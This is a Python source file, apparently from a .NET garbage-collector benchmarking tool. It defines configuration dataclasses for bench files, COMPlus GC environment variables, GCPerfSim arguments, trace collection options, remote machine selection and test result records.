@doc_field(
"no_readjust",
"""
If true, the memory load process will never allocate or free any more memory after it's started.
If false, it will allocate or free in order to keep the system's memory at `percent`.
""",
)
@with_slots
@dataclass(frozen=True)
class MemoryLoadOptions:
percent: float
no_readjust: Optional[bool] = None
def __post_init__(self) -> None:
assert_is_percent(self.percent)
@doc_field("complus_gcserver", "Set to true to use server GC.")
@doc_field("complus_gcconcurrent", "Set to true to allow background GCs.")
@doc_field("complus_gcgen0size", "gen0size in bytes. (decimal)")
@doc_field("complus_gcgen0maxbudget", "Max gen0 budget in bytes. (decimal)")
@doc_field(
"complus_gcheapaffinitizeranges",
"""
On non-Windows, this should look like: 1,3,5,7-9,12
On Windows, this should include group numbers, like: 0:1,0:3,0:5,1:7-9,1:12
""",
)
@doc_field(
"complus_gcheapcount",
"""
Number of heaps. (decimal)
Only has effect when complus_gcserver is set.
""",
)
@doc_field("complus_gcheaphardlimit", "Hard limit on heap size, in bytes. (decimal)")
@doc_field(
"complus_gcheaphardlimitsoh", "Hard limit on small object heap size, in bytes. (decimal)"
)
@doc_field(
"complus_gcheaphardlimitloh", "Hard limit on large object heap size, in bytes. (decimal)"
)
@doc_field(
"complus_gcheaphardlimitpoh", "Hard limit on pinned object heap size, in bytes. (decimal)"
)
@doc_field("complus_gclargepages", "Set to true to enable large pages.")
@doc_field("complus_gcnoaffinitize", "Set to true to prevent affinitizing GC threads to cpu cores.")
@doc_field("complus_gccpugroup", "Set to true to enable CPU groups.")
@doc_field("complus_gcnumaaware", "Set to false to disable NUMA-awareness in GC")
@doc_field(
"complus_thread_useallcpugroups",
"Set to true to automatically distribute threads across CPU Groups",
)
@doc_field(
"complus_threadpool_forcemaxworkerthreads",
"Overrides the MaxThreads setting for the ThreadPool worker pool",
)
@doc_field("complus_tieredcompilation", "Set to true to enable tiered compilation")
@doc_field(
"complus_bgcfltuningenabled",
"Set to true to enable https://github.com/dotnet/coreclr/pull/26695",
)
@doc_field("complus_bgcmemgoal", "See comment on https://github.com/dotnet/coreclr/pull/26695")
@doc_field("complus_bgcmemgoalslack", "See comment on https://github.com/dotnet/coreclr/pull/26695")
@doc_field(
"complus_gcconcurrentfinalization",
"Enable concurrent finalization (not available in normal coreclr builds)",
)
@doc_field(
"container",
"""
Set to run the test in a container.
A container is a job object on Windows, or cgroups / docker container on non-Windows.
""",
)
@doc_field(
"affinitize",
"""
If true, this will be run in a job object affinitized to a single core.
Only works on Windows.
See `run_in_job.c`'s `--affinitize` option.
""",
)
@doc_field(
"memory_load",
"If set, the test runner will launch a second process that ensures "
+ "this percentage of the system's memory is consumed.",
)
@with_slots
@dataclass(frozen=True)
class ConfigOptions:
complus_gcserver: Optional[bool] = None
complus_gcconcurrent: Optional[bool] = None
# This is in bytes
complus_gcgen0size: Optional[int] = None
complus_gcgen0maxbudget: Optional[int] = None
complus_gcheapaffinitizeranges: Optional[str] = None
complus_gcheapcount: Optional[int] = None
complus_gcheaphardlimit: Optional[int] = None
complus_gcheaphardlimitsoh: Optional[int] = None
complus_gcheaphardlimitloh: Optional[int] = None
complus_gcheaphardlimitpoh: Optional[int] = None
complus_gclargepages: Optional[bool] = None
complus_gcnoaffinitize: Optional[bool] = None
complus_gccpugroup: Optional[bool] = None
complus_gcnumaaware: Optional[bool] = None
complus_thread_useallcpugroups: Optional[bool] = None
complus_threadpool_forcemaxworkerthreads: Optional[int] = None
complus_tieredcompilation: Optional[bool] = None
complus_bgcfltuningenabled: Optional[bool] = None
complus_bgcmemgoal: Optional[int] = None
complus_bgcmemgoalslack: Optional[int] = None
complus_gcconcurrentfinalization: Optional[bool] = None
container: Optional[TestConfigContainer] = None
affinitize: Optional[bool] = None
memory_load: Optional[MemoryLoadOptions] = None
def __post_init__(self) -> None:
if self.complus_gcheapaffinitizeranges is not None:
_parse_heap_affinitize_ranges(self.complus_gcheapaffinitizeranges)
@doc_field(
"coreclr_specific",
"""
Maps coreclr name to config options for only that coreclr.
If present, should have an entry for every coreclr.
""",
)
@with_slots
@dataclass(frozen=True)
class Config(ConfigOptions):
"""
Allows setting environment variables, as well as container and memory load options.
WARN: Normally complus environment variables are specified in hexadecimal on the command line.
But when specifying them in a yaml file, use decimal.
"""
coreclr_specific: Optional[Mapping[str, ConfigOptions]] = None
# Remember to update TestConfigCombined.env when adding a new field
@staticmethod
def serialize_mappings() -> SerializeMappings:
def f(x: Optional[int]) -> Optional[HexInt]:
return map_option(x, HexInt)
return {field.name: f for field in fields(Config) if field.type is int}
def to_str_pretty(self) -> str:
return ", ".join(
# NOTE: not using isinstance(value, int) because apparently bools are ints
f"{field.name}={hex(value) if field.type is int else str(value)}"
for field in fields(Config)
for value in (getattr(self, field.name),)
if value is not None
)
@with_slots
@dataclass(frozen=True)
class HeapAffinitizeRange:
group: Optional[int]
# both inclusive
lo: int
hi: int
def __post_init__(self) -> None:
assert self.lo <= self.hi
@with_slots
@dataclass(frozen=True)
class HeapAffinitizeRanges:
ranges: Sequence[HeapAffinitizeRange]
def _parse_heap_affinitize_ranges(s: str) -> HeapAffinitizeRanges:
# Based on 'ParseGCHeapAffinitizeRanges' in gcconfig.cpp
# The cpu index ranges is a comma separated list of indices or ranges of indices (e.g. 1-5).
# Example 1,3,5,7-9,12
parts = s.split(",")
ranges = [_parse_heap_affinitize_range(part) for part in parts]
_assert_sorted_and_non_overlapping(ranges)
return HeapAffinitizeRanges(ranges)
def _assert_sorted_and_non_overlapping(ranges: Sequence[HeapAffinitizeRange]) -> None:
prev = -1
for r in ranges:
assert r.lo > prev
prev = r.hi
def _parse_heap_affinitize_range(s: str) -> HeapAffinitizeRange:
if ":" in s:
l, r = s.split(":", 1)
return _parse_heap_affinitize_range_after_group(int(l), r)
else:
return _parse_heap_affinitize_range_after_group(None, s)
def _parse_heap_affinitize_range_after_group(group: Optional[int], s: str) -> HeapAffinitizeRange:
if "-" in s:
l, r = s.split("-", 1)
return HeapAffinitizeRange(group=group, lo=int(l), hi=int(r))
else:
x = int(s)
return HeapAffinitizeRange(group=group, lo=x, hi=x)
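# For example, the non-Windows form parses as:
#   _parse_heap_affinitize_ranges("1,3,5,7-9,12")
#   -> ranges (group=None): 1-1, 3-3, 5-5, 7-9, 12-12
# while the Windows form ("0:1,0:3,1:7-9") carries a group number per range.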
@with_slots
@dataclass(frozen=True)
class TestConfigCombinedWithCoreclr:
"""
This is the combination of:
* common_config
* a particular config
* coreclr_specific for that config
"""
cfg: ConfigOptions
def __post_init__(self) -> None:
cfg = self.cfg
assert (cfg.complus_gcheapaffinitizeranges is not None) == (
cfg.complus_gccpugroup == True
), (
"Either both complus_gcheapaffinitizeranges and complus_gccpugroup should be set,"
+ " or neither should"
)
if cfg.complus_bgcmemgoal or cfg.complus_bgcmemgoalslack:
assert (
cfg.complus_bgcfltuningenabled
), "bgcmemgoal does nothing without bgcfltuningenabled"
if cfg.complus_gcconcurrentfinalization:
assert (
cfg.complus_gcconcurrent
), "gcconcurrentfinalization only has effect if gcconcurrent"
def env(self, core_root: Optional[Path]) -> Mapping[str, str]:
cfg = self.cfg
def od(name: str, v: Optional[int]) -> Optional[Mapping[str, str]]:
return optional_mapping(name, map_option(v, hex_no_0x))
def ob(name: str, v: Optional[bool]) -> Optional[Mapping[str, str]]:
return optional_mapping(name, map_option(v, lambda b: str(int(b))))
return combine_mappings(
empty_mapping() if core_root is None else {"CORE_ROOT": str(core_root)},
*filter_not_none(
(
ob("COMPlus_gcServer", cfg.complus_gcserver),
ob("COMPlus_gcConcurrent", cfg.complus_gcconcurrent),
od("COMPlus_GCgen0size", cfg.complus_gcgen0size),
od("COMPlus_GCGen0MaxBudget", cfg.complus_gcgen0maxbudget),
optional_mapping(
"COMPlus_GCHeapAffinitizeRanges", cfg.complus_gcheapaffinitizeranges
),
od("COMPlus_GCHeapCount", cfg.complus_gcheapcount),
od("COMPlus_GCHeapHardLimit", cfg.complus_gcheaphardlimit),
od("COMPlus_GCHeapHardLimitSOH", cfg.complus_gcheaphardlimitsoh),
od("COMPlus_GCHeapHardLimitLOH", cfg.complus_gcheaphardlimitloh),
od("COMPlus_GCHeapHardLimitPOH", cfg.complus_gcheaphardlimitpoh),
ob("COMPlus_GCLargePages", cfg.complus_gclargepages),
ob("COMPlus_GCNoAffinitize", cfg.complus_gcnoaffinitize),
ob("COMPlus_GCCpuGroup", cfg.complus_gccpugroup),
ob("COMPlus_GCNumaAware", cfg.complus_gcnumaaware),
ob("COMPlus_Thread_UseAllCpuGroups", cfg.complus_thread_useallcpugroups),
od(
"COMPlus_ThreadPool_ForceMaxWorkerThreads",
cfg.complus_threadpool_forcemaxworkerthreads,
),
ob("COMPlus_TieredCompilation", cfg.complus_tieredcompilation),
ob("COMPlus_BGCFLTuningEnabled", cfg.complus_bgcfltuningenabled),
od("COMPlus_BGCMemGoal", cfg.complus_bgcmemgoal),
od("COMPlus_BGCMemGoalSlack", cfg.complus_bgcmemgoalslack),
ob("COMPLUS_GCConcurrentFinalization", cfg.complus_gcconcurrentfinalization),
)
),
)
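# For example (hypothetical config): with complus_gcserver=True and
# complus_gcheapcount=4, env() yields a CORE_ROOT entry (when core_root is
# given) plus {"COMPlus_gcServer": "1", "COMPlus_GCHeapCount": "4"};
# booleans become "0"/"1" and ints are hex-formatted without a "0x" prefix.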
# Combined CommonConfig and individual test's config
@with_slots
@dataclass(frozen=True)
class TestConfigCombined:
cfg: Config # includes coreclr_specific
@property
def container(self) -> Optional[TestConfigContainer]:
return self.cfg.container
@property
def affinitize(self) -> Optional[bool]:
return self.cfg.affinitize
@property
def complus_gcheapcount(self) -> Optional[int]:
return self.cfg.complus_gcheapcount
@property
def complus_gcserver(self) -> Optional[bool]:
return self.cfg.complus_gcserver
@property
def memory_load(self) -> Optional[MemoryLoadOptions]:
return self.cfg.memory_load
def with_coreclr(self, coreclr_name: str) -> TestConfigCombinedWithCoreclr:
specific = option_or(
map_option(self.cfg.coreclr_specific, lambda cs: cs.get(coreclr_name)), ConfigOptions()
)
return TestConfigCombinedWithCoreclr(
combine_dataclasses_with_optional_fields(ConfigOptions, self.cfg, specific)
)
@with_slots
@dataclass(frozen=True)
class PartialConfigAndName:
name: str
config: Config
def to_tuple(self) -> Tuple[str, Config]:
return self.name, self.config
@with_slots
@dataclass(frozen=True)
class FullConfigAndName:
name: str
config: TestConfigCombined
@property
def as_partial(self) -> PartialConfigAndName:
return PartialConfigAndName(self.name, self.config.cfg)
@doc_field("none", "Do not collect any trace events.")
@doc_field("gc", "Collect normal GC events.")
@doc_field("verbose", "Collect verbose GC events, which includes join events.")
@doc_field("cpu_samples", "Collect all of the above, and CPU samples.")
@doc_field(
"thread_times",
"Collect all of the above and Thread Times Stacks with CSwitch events. Windows only.",
)
class CollectKind(OrderedEnum):
none = 0
gc = 1
verbose = 2
cpu_samples = 3
thread_times = 4
def doc_enum(e: Type[Enum]) -> str:
def part(member: str) -> Optional[str]:
info = get_field_info_from_name(e, member)
return None if info.hidden else f"{member}: {info.doc}"
return "\n".join(p for member in e for p in optional_to_iter(part(member.name)))
@with_slots
@dataclass(frozen=True)
class LogOptions:
"""
Options for enabling 'dprintf' statements from gc.cpp.
You'll need to modify coreclr too for this to work.
This slows the process down, so not recommended for performance testing.
"""
file_size_mb: int
@doc_field(
"collect",
f"""
Kind of events to collect.
Defaults to 'gc'.
{doc_enum(CollectKind)}
""",
)
@doc_field(
"default_iteration_count",
"""
Number of times to run the same test combination.
"Defaults to 1.
"Without this you will not get stdev.
""",
)
@doc_field(
"default_min_seconds",
"""
If a test is over in less than this many seconds, the test runner will throw an exception.
This ensures that tests have sufficient data for performance analysis.
May be overridden by Benchmark#min_seconds
""",
)
@doc_field(
"default_max_seconds",
"""
The test runner will stop a process that goes longer than this and fail.
May be overridden by Benchmark#max_seconds.
""",
)
@doc_field(
"max_trace_size_gb",
"""
If the trace exceeds this size, old events will be discarded.
Defaults to 1.
""",
)
@doc_field(
"dotnet_path",
"""
Custom 'dotnet' path to use when building.
Does not affect running.
""",
)
@doc_field(
"dotnet_trace_path",
"""
Set this in case dotnet-trace is not in PATH.
Useful for tests that must be run as super user.
""",
)
@doc_field(
"dotnet_trace_buffersize_mb",
"""
Value to pass to `--buffersize` argument of dotnet-trace, in MB.
Default is dotnet-trace's default, currently 256MB.
""",
)
@doc_field(
"always_use_dotnet_trace",
"""
Always use dotnet-trace to collect traces, even on Windows where PerfView is the default.
Has no effect on non-Windows.
Has no effect if `collect` is `none`.
""",
)
@doc_field("log", "Options for enabling dprintf logging", hidden=True)
@with_slots
@dataclass(frozen=True)
class BenchOptions:
# Not putting the default (CollectKind.gc) here
# as that would mean the property would be created when serializing.
collect: Optional[CollectKind] = None
# Defaults to 1
default_iteration_count: Optional[int] = None
default_min_seconds: Optional[float] = None
default_max_seconds: Optional[float] = None
max_trace_size_gb: Optional[float] = None
dotnet_path: Optional[Path] = None
dotnet_trace_path: Optional[Path] = None
dotnet_trace_buffersize_mb: Optional[int] = None
always_use_dotnet_trace: Optional[bool] = None
log: Optional[LogOptions] = None
def __post_init__(self) -> None:
assert self.default_iteration_count is None or self.default_iteration_count >= 1
@property
def get_collect(self) -> CollectKind:
return option_or(self.collect, CollectKind.gc)
class AllocType(Enum):
simple = 0
reference = 1
class TestKind(Enum):
time = 0
highSurvival = 1
# Not documenting fields here as GCPerfSim should do that.
@doc_field("tc", None)
@doc_field("tagb", None)
@doc_field("tlgb", None)
@doc_field("totalMins", None)
@doc_field("lohar", None)
@doc_field("sohsi", None)
@doc_field("lohsi", None)
@doc_field("pohsi", None)
@doc_field("sohpi", None)
@doc_field("lohpi", None)
@doc_field("pohpi", None)
@doc_field("sohfi", None)
@doc_field("lohfi", None)
@doc_field("pohfi", None)
@doc_field("allocType", None)
@doc_field("testKind", None)
@with_slots
@dataclass(frozen=True)
class GCPerfSimArgs:
"""
Represents the arguments to GCPerfSim.
Read the GCPerfSim source for documentation.
"""
tc: int
tagb: float
tlgb: float
totalMins: Optional[float] = None
lohar: int = 0
sohsi: int = 0
lohsi: int = 0
pohsi: int = 0
sohpi: int = 0
lohpi: int = 0
pohpi: int = 0
sohfi: int = 0
lohfi: int = 0
pohfi: int = 0
allocType: AllocType = AllocType.reference
testKind: TestKind = TestKind.time
def to_map(self) -> Mapping[str, str]:
return {
"-tc": str(self.tc),
"-tagb": str(self.tagb),
"-tlgb": str(self.tlgb),
**(empty_mapping() if self.totalMins is None else {"-totalMins": str(self.totalMins)}),
"-lohar": str(self.lohar),
"-sohsi": str(self.sohsi),
"-lohsi": str(self.lohsi),
"-pohsi": str(self.pohsi),
"-sohpi": str(self.sohpi),
"-lohpi": str(self.lohpi),
"-pohpi": str(self.pohpi),
"-sohfi": str(self.sohfi),
"-lohfi": str(self.lohfi),
"-pohfi": str(self.pohfi),
"-allocType": self.allocType.name,
"-testKind": self.testKind.name,
}
def to_seq(self) -> Sequence[str]:
return [x for pair in self.to_map().items() for x in pair]
def to_str(self) -> str:
return " ".join(self.to_seq())
@doc_field("executable", "Path or key into 'paths' from the BenchFile.\nDefaults to \"GCPerfSim\".")
@doc_field(
"arguments",
"Command line arguments to pass to the executable.\n"
"For GCPerfSim, you can also specify GCPerfSimArgs, "
"and it will be converted to a string for you.",
)
@doc_field("iteration_count", "Defaults to options.default_iteration_count")
@doc_field("min_seconds", "Defaults to options.default_min_seconds")
@doc_field("max_seconds", "Defaults to options.default_max_seconds")
@doc_field("only_configs", "Only run the test against configs with one of the specified names.")
@with_slots
@dataclass(frozen=True)
class Benchmark:
executable: Optional[str] = None
arguments: Optional[Union[str, GCPerfSimArgs]] = None
iteration_count: Optional[int] = None
min_seconds: Optional[float] = None
max_seconds: Optional[float] = None
only_configs: Optional[Sequence[str]] = None
@property
def arguments_list(self) -> Sequence[str]:
if self.arguments is None:
return ()
elif isinstance(self.arguments, str):
return self.arguments.split()
else:
return self.arguments.to_seq()
def get_argument(self, name: str) -> Optional[str]:
args = self.arguments_list
for i, arg in enumerate(args):
if arg == name:
return args[i + 1]
return None
@property
def get_executable(self) -> str:
return option_or(self.executable, "GCPerfSim")
def executable_and_arguments(self) -> str:
ex = self.get_executable
return ex if self.arguments is None else f"{ex} {self.arguments}"
def __post_init__(self) -> None:
assert self.iteration_count is None or self.iteration_count >= 1
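# For example (hypothetical arguments):
#   Benchmark(arguments="-tc 2 -tagb 300").get_argument("-tc")   -> "2"
#   Benchmark(arguments="-tc 2 -tagb 300").get_argument("-tlgb") -> None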
@with_slots
@dataclass(frozen=True)
class BenchmarkAndName:
name: str
benchmark: Benchmark
class Architecture(Enum):
amd64 = 0
x86 = 1
arm64 = 2
arm32 = 3
class Bitness(Enum):
bit32 = 0
bit64 = 1
@property
def to_int(self) -> int:
return {Bitness.bit32: 32, Bitness.bit64: 64}[self]
@overrides
def __str__(self) -> str:
return f"{self.to_int}-bit"
# TODO:MOVE
def get_architecture_bitness(a: Architecture) -> Bitness:
return {
Architecture.amd64: Bitness.bit64,
Architecture.x86: Bitness.bit32,
Architecture.arm64: Bitness.bit64,
Architecture.arm32: Bitness.bit32,
}[a]
def get_this_machines_architecture() -> Architecture:
m = platform_machine()
if m in ("AMD64", "x86_64"):
return Architecture.amd64
elif m == "armv71":
return Architecture.arm64
else:
raise Exception(f"TODO: Fill in get_this_machines_architecture() for {m}")
@doc_field(
"self_contained",
"""
If this is set, benchmark executables should be self-contained.
Then core_root and repo_path should not be set.
""",
)
@doc_field(
"core_root",
"""
Path to a Core_Root directory built from coreclr.
(Does not need to still be located inside a coreclr repository.)
""",
)
@doc_field(
"exact_path",
"""
Path to the corerun executable.
Generally prefer 'core_root' to this.
""",
)
@doc_field(
"repo_path",
"""
Instead of specifying Core_Root, you could specify the path to the repository.
Core_Root will be the default location of a release build.
When running on a remote machine, the coreclr path must already exist on that machine.
It should be at the same path in every machine being tested.
Or, it may be a UNC path.
""",
)
@doc_field(
"commit_hash",
"""
Optional; git commit hash that Core_Root was built from.
On Windows, if SigCheck was installed,
the test runner will verify that CoreRun.exe was tagged with this hash.
On non-Windows this is just for information.
""",
)
@doc_field(
"architecture",
"""
On Windows, if SigCheck was installed, the test runner will verify that
CoreRun.exe has the correct bitness corresponding to this architecture.
On non-Windows this is just for information.
""",
)
@with_slots
@dataclass(frozen=True)
class CoreclrSpecifier:
self_contained: Optional[bool] = None
# Path to CORE_ROOT directory
core_root: Optional[Path] = None
# Repository path
repo_path: Optional[Path] = None
exact_path: Optional[Path] = None
commit_hash: Optional[str] = None
architecture: Optional[Architecture] = None
def __post_init__(self) -> None:
assert (
self.self_contained != False
), "Instead of setting self_contained: false, just don't specify it"
assert _exactly_one_of(
self.self_contained is not None,
self.repo_path is not None,
self.core_root is not None,
self.exact_path is not None,
), (
"In 'coreclr:', exactly one of "
"'self_contained', 'core_root', and 'repo_path' should be specified."
)
def get_architecture(self) -> Architecture:
return (
self.architecture if self.architecture is not None else get_this_machines_architecture()
)
def _exactly_one_of(a: bool, b: bool, c: bool, d: bool) -> bool:
return a + b + c + d == 1
@with_slots
@dataclass(frozen=True)
class CoreclrAndName:
name: str
coreclr: CoreclrSpecifier
@doc_field("name", "Name of the property we are testing different values for.")
@doc_field(
"default_values",
"Value that coreclr would use without an explicit config.\nKey is a coreclr name.",
)
@with_slots
@dataclass(frozen=True)
class ConfigsVaryBy:
name: str
default_values: Optional[Mapping[str, float]] = None
@with_slots
@dataclass(frozen=True)
class _MachinesFile:
machines: Sequence[str]
@with_slots
@dataclass(frozen=True)
class Machine:
name: str
@property
def is_this_machine(self) -> bool:
return self.name == get_hostname()
def get_this_machine() -> Machine:
return Machine(get_hostname())
MACHINE_DOC = """
The `--machine` argument can take multiple arguments like `name:machinea name:machineb`.
It can also take `file:C:/bench/machines.yaml`, where that file should look like:
machines:
- machinea
- machineb
Each name should be the name of a machine on your network.
"""
MAX_ITERATIONS_FOR_ANALYZE_DOC = """
Only analyze this many test iterations even when more are available.
This will speed up analysis.
"""
MAX_ITERATIONS_FOR_RUN_DOC = """
Only run at most this many iterations of a test,
even when 'default_iterations' or 'iterations' specifies a higher number.
If you do this, you'll have to specify '--max-iterations' again when analyzing the test results.
"""
def parse_machines_arg(machine_args: Optional[Sequence[str]]) -> Sequence[Machine]:
if machine_args is None:
return (get_this_machine(),)
def get_machines(m: str) -> Sequence[Machine]:
if m == "this":
return (get_this_machine(),)
file = try_remove_str_start(m, "file:")
if file is not None:
return [
Machine(m)
for m in load_yaml(_MachinesFile, get_existing_absolute_file_path(file)).machines
]
else:
return (Machine(remove_str_start(m, "name:")),)
return [x for m in machine_args for x in get_machines(m)]
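# For example:
#   parse_machines_arg(None)                      -> (this machine,)
#   parse_machines_arg(["name:machinea", "this"]) -> [Machine("machinea"), this machine]
# and "file:C:/bench/machines.yaml" expands to every machine listed in that file.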
@with_slots
@dataclass(frozen=True)
class SingleTestCombination:
machine: Machine
coreclr: CoreclrAndName
config: PartialConfigAndName
benchmark: BenchmarkAndName
@property
def machine_name(self) -> str:
return self.machine.name
@property
def coreclr_name(self) -> str:
return self.coreclr.name
@property
def config_name(self) -> str:
return self.config.name
@property
def benchmark_name(self) -> str:
return self.benchmark.name
@property
def name(self) -> str:
return (
f"{self.machine_name}__{self.coreclr_name}__{self.config_name}__{self.benchmark_name}"
)
@with_slots
@dataclass(frozen=True)
class TestRunStatus:
success: bool
# This will be missing if 'collect' was specified as 'none' in BenchOptions
trace_file_name: Optional[
str
] = None # File should be stored in the same directory as test status
process_args: Optional[str] = None
process_id: Optional[int] = None
process_name: Optional[str] = None
seconds_taken: Optional[float] = None
test: Optional[SingleTestCombination] = None
stdout: Optional[str] = None
# This will be missing if the test run was not GCPerfSim
gcperfsim_result: Optional[GCPerfSimResult] = None
def __post_init__(self) -> None:
if self.trace_file_name is not None:
# Process ID is mutually exclusive with Name and Args. If any of the
# latter are set, then the former should not be there, and vice versa.
assert any(
val is not None for val in [self.process_args, self.process_id, self.process_name]
), (
"Test status file must set process_id, process_name, or process_args"
" if trace_file_name is set."
)
if self.process_id is not None:
assert (
self.process_name is None and self.process_args is None
), "Process Name and Args should not be set if Process ID is given."
else:
assert (
self.process_id is None and self.process_name is None
), "'process_id' and 'process_name' have no effect without 'trace_file_name'."
def get_process_data_tuple(self) -> Sequence[str]:
return tuple(
f"{k}:{v}"
for k, v in {"name": self.process_name, "args": self.process_args}.items()
if v is not None
)
@with_slots
@dataclass(frozen=True)
class PartialTestCombination:
machine: Optional[Machine] = None
coreclr_and_name: Optional[CoreclrAndName] = None
config_and_name: Optional[PartialConfigAndName] = None
benchmark_and_name: Optional[BenchmarkAndName] = None
@property
def machine_name(self) -> Optional[str]:
return None if self.machine is None else self.machine.name
@property
def coreclr_name(self) -> Optional[str]:
return None if self.coreclr_and_name is None else self.coreclr_and_name.name
@property
def config(self) -> Optional[Config]:
return None if self.config_and_name is None else self.config_and_name.config
@property
def config_name(self) -> Optional[str]:
return None if self.config_and_name is None else self.config_and_name.name
@property
def benchmark(self) -> Optional[Benchmark]:
return None if self.benchmark_and_name is None else self.benchmark_and_name.benchmark
@property
def benchmark_name(self) -> Optional[str]:
return None if self.benchmark_and_name is None else self.benchmark_and_name.name
@property
def name(self) -> str:
parts: Sequence[str] = (
*optional_to_iter(self.machine_name),
*optional_to_iter(self.coreclr_name),
*optional_to_iter(self.config_name),
*optional_to_iter(self.benchmark_name),
)
return "only test" if is_empty(parts) else "__".join(parts)
class Vary(Enum):
machine = 0
coreclr = 1
config = 2
benchmark = 3
VARY_DOC = """
Kind of thing we want to compare.
For example, if we vary coreclr,
we'll show one diff for each combination of config and benchmark.
Defaults to the bench file's specified 'vary'.
"""
@doc_field("comment", "(ignored)")
@doc_field("vary", "Preferred property to vary when using `py . diff`")
@doc_field(
"configs_vary_by",
"""
This is mostly set just for information.
When there are many configs, this describes the one property that is changing.
""",
)
@doc_field("coreclrs", "Mapping from an (arbitrary) coreclr name to its specifier.")
@doc_field(
"paths",
"""
Mapping of shorthand names for paths.
If the 'executable' field of a Benchmark is a key in this mapping,
it will be replaced with the corresponding value.
""",
)
@doc_field("options", "Additional options that apply to every test.")
@doc_field(
"common_config",
"""
Config properties common to all configs.
Properties set here should not overlap with anything in 'configs'.
If omitted, the common config is empty.
""",
)
@doc_field(
"configs",
"""
Mapping from an (arbitrary) config name to the config.
Unlike coreclrs and benchmarks, this section is optional.
If omitted, common_config will be used.
""",
)
@doc_field("benchmarks", "Mapping from an (arbitrary) benchmark name to the benchmark.")
@doc_field("scores", "Mapping from an (arbitrary) score name to its specifier.")
@with_slots
@dataclass(frozen=True)
class BenchFile:
comment: Optional[str] = None
vary: Optional[Vary] = None
configs_vary_by: Optional[ConfigsVaryBy] = None
coreclrs: Mapping[str, CoreclrSpecifier] = empty_mapping()
paths: Optional[Mapping[str, Path]] = None # Maps name to path
options: BenchOptions = BenchOptions()
common_config: Optional[Config] = None
configs: Optional[Mapping[str, Config]] = None
benchmarks: Mapping[str, Benchmark] = empty_mapping()
scores: Optional[Mapping[str, ScoreSpec]] = None
def __post_init__(self) -> None:
assert not is_empty(self.coreclrs), "Benchfile must have at least one coreclr"
assert not is_empty(self.benchmarks), "Benchfile must have at least one benchmark"
assert self.configs is None or not is_empty(self.configs)
@property
def coreclrs_and_names(self) -> Sequence[CoreclrAndName]:
return [CoreclrAndName(k, v) for k, v in self.coreclrs.items()]
@property
def partial_configs_and_names(self) -> Sequence[PartialConfigAndName]:
if self.configs is None:
return (PartialConfigAndName("only_config", Config()),)
else:
return [PartialConfigAndName(k, v) for k, v in self.configs.items()]
@property
def full_configs_and_names(self) -> Sequence[FullConfigAndName]:
return [
FullConfigAndName(cn.name, combine_test_configs(self.common_config, cn.config))
for cn in self.partial_configs_and_names
]
@property
def benchmarks_and_names(self) -> Sequence[BenchmarkAndName]:
return [BenchmarkAndName(k, v) for k, v in self.benchmarks.items()]
@with_slots
@dataclass(frozen=True)
class BenchFileAndPath:
content: BenchFile
path: Path
def _split_unc_path(s: str) -> Tuple[str, str]:
unc_path = remove_str_start(s, "\\\\")
parts = unc_path.split("\\", maxsplit=1)
assert len(parts) == 2
return cast(Tuple[str, str], tuple(parts))
# machine=None means this machine
def change_path_machine(path: Path, machine: Optional[Machine]) -> Path:
s = str(path)
if s.startswith("\\\\"):
# It's a UNC path -- replace the machine name
rest = _split_unc_path(s)[1]
if machine is None:
root = {OS.posix: "", OS.windows: "C:"}[get_os()]
else:
root = f"//{machine.name}"
return Path(f"{root}/{rest}")
elif machine is None or machine.is_this_machine:
# Not changing machine
return path
elif s[1:].startswith(":\\"):
# Windows drive
if s[0] != "C":
raise Exception("TODO: Accessing a non-'C' drive via UNC path?")
rest = remove_str_start(s, "C:\\")
return Path(f"//{machine.name}/{rest}")
else:
raise Exception("TODO: UNC path to a non-windows path?")
def out_dir_for_bench_yaml(bench_file: Path, machine: Machine) -> Path:
return add_extension(change_path_machine(bench_file, machine), "out")
def parse_bench_file(path: Path) -> BenchFileAndPath:
return BenchFileAndPath(load_yaml(BenchFile, path), path)
ProcessQuery = Optional[Sequence[str]]
@with_slots
@dataclass(frozen=True)
class TestResult:
test_status_path: Optional[Path] = None
trace_path: Optional[Path] = None
process: ProcessQuery = None
def __post_init__(self) -> None:
if self.trace_path is None:
assert self.process is None
# Must be a tuple: a list would make this frozen dataclass unhashable.
if self.process is not None:
assert isinstance(self.process, tuple)
assert self.test_status_path is not None or self.trace_path is not None
assert self.test_status_path is None or self.test_status_path.name.endswith(".yaml")
assert self.trace_path is None or is_trace_path(self.trace_path)
def load_test_status(self) -> Optional[TestRunStatus]:
return map_option(self.test_status_path, load_test_status)
@property
def trace_or_test_status_path(self) -> Path:
return non_null(option_or(self.trace_path, self.test_status_path))
@property
def test_status_or_trace_path(self) -> Path:
return non_null(option_or(self.test_status_path, self.trace_path))
def __str__(self) -> str:
return str(self.test_status_or_trace_path)
class TraceKind(Enum):
Etl_or_Btl = 0
Nettrace = 1
Perfcollect = 2
def is_trace_path(trace_path: Path) -> bool:
return _try_get_trace_kind(trace_path) is not None
def get_trace_kind(trace_path: Path) -> TraceKind:
kind = _try_get_trace_kind(trace_path)
assert kind is not None, f"Unexpected trace file {trace_path}"
return kind
def _try_get_trace_kind(trace_path: Path) -> Optional[TraceKind]:
name = trace_path.name.lower()
if name.endswith(".etl") or name.endswith(".btl"):
return TraceKind.Etl_or_Btl
elif name.endswith(".nettrace"):
return TraceKind.Nettrace
elif name.endswith(".trace.zip"):
return TraceKind.Perfcollect
else:
return None
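# For example:
#   foo.etl / foo.btl -> TraceKind.Etl_or_Btl
#   foo.nettrace      -> TraceKind.Nettrace
#   foo.trace.zip     -> TraceKind.Perfcollect
# Anything else yields None, so is_trace_path() returns False for it.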
def load_test_status(path: Path) -> TestRunStatus:
return load_yaml(TestRunStatus, path)
class TestPaths:
out_path_base: Path
def __init__(self, base: Path):
self.out_path_base = base
def add_ext(self, ext: str) -> Path:
return add_extension(self.out_path_base, ext)
@property
def test_status_path(self) -> Path:
return add_extension(self.out_path_base, "yaml")
def exists(self) -> bool:
return self.test_status_path.exists()
def load_test_status(self) -> TestRunStatus:
return load_yaml(TestRunStatus, self.test_status_path)
def to_test_result(self) -> TestResult:
return TestResult(
test_status_path=self.test_status_path,
trace_path=self.load_trace_file_path_if_success(),
)
def load_trace_file_path_if_success(self) -> Optional[Path]:
test_status = self.load_test_status()
if test_status.success and test_status.trace_file_name is not None:
return self.out_path_base.parent / test_status.trace_file_name
else:
return None
def trace_file_path(self, test_status: TestRunStatus) -> Optional[Path]:
return map_option(test_status.trace_file_name, lambda n: self.out_path_base.parent / n)
def write_test_status(self, test_status: TestRunStatus) -> None:
write_yaml_file(self.test_status_path, test_status)
@with_slots
@dataclass(frozen=True)
class SingleTestToRun:
bench_file: BenchFile
test: SingleTestCombination
iteration: int
